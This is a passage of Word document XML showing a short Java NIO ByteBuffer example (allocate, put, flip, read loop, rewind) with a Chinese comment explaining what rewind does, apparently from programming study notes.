        <w:t>Buffer</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ab"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="00193184" w:rsidTr="00193184">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00193184" w:rsidRPr="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>static</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>void</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> main(String[] </w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>args</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00193184" w:rsidRPr="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">ByteBuffer </w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>byteBuffer</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> = ByteBuffer.</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>allocate</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>(100);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00193184" w:rsidRPr="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00193184" w:rsidRPr="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>byteBuffer</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.put((</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>byte</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>)1);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00193184" w:rsidRPr="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>byteBuffer</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.put((</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>byte</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>)2);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00193184" w:rsidRPr="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w:rsidR="00193184" w:rsidRPr="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>byteBuffer</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.flip();</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00193184" w:rsidRPr="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>while</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>byteBuffer</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.hasRemaining()) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00193184" w:rsidRPr="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>byte</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>c</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>byteBuffer</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.get();</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00193184" w:rsidRPr="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>System.</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="0000C0"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>out</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.println(</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>c</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00193184" w:rsidRPr="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00193184" w:rsidRPr="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00193184" w:rsidRPr="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>//position</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>置为</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>limit</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>保持不变，可以用于重复读取一段数据</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00193184" w:rsidRPr="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>byteBuffer</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.rewind();</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00193184" w:rsidRPr="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
